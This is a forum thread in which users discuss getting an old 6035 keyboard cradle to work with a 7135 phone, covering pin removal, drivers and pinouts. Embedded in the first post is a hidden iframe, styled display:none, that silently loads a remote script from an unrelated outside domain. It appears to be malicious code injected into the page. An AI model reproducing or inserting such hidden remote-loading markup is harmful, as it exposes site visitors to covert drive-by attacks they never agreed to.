+ Reply to Thread

6035 keyboard cradle with 7135

I realize this topic has come up in another thread, but it seems to have gotten lost in the shuffle. I'm interested in hearing from folks who have or have not had success using their old 7135 keyboard cradle with the 7135. I have cut the 2 pins off the cradle so that the 7135 fits in, but when I put the phone in, it starts the Hotsync dialog. I'd really like to get the phone up a little higher when using the keyboard (off the table!). Has anyone actually been able to get this to work? And if so, what am I missing?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    The 7135 is a marathon, not a Sprint

Fully Converged
    Did you load the new driver?
    From the Middle of the Sea ;-)

Originally posted by joekonaiii
    Did you load the new driver?
    Yes, and the keyboard works as long as I use the new, annoyingly short cable. If I hadn't read on here that a few folks had used the old 6035 keyboard cradle with the 7135, I wouldn't believe it could be done. What I'm wondering is what they did differently to make it work.

Go to ep's post in the "6035 Hot Sync Cradle work with 7135?" thread. He has a step by step proceedure with pics for modifiing a 6035 Cradle for use with a 7135.
    mg
    Luck is where opportunity meets preparation.

Those are instructions for modifying the charging cradle. I'm trying to get the keyboard cradle to work.

Ahh.. sorry, yes your right... But I recall reading about that too. If I find it in my wanderings I'll post it. What would really be helpful is the more basic question if anybody knows the pinouts for the 7135 and the 6035 data cable ports. That way we could make our own modifications to our 6035 hardware for the keyboards, cradles, car kits, etc.! I have a hands free car kit that works with a 6035 that I wouldn't mind modfiying! (but that's a post for another thread, when I find it)
    mg
    Luck is where opportunity meets preparation.

^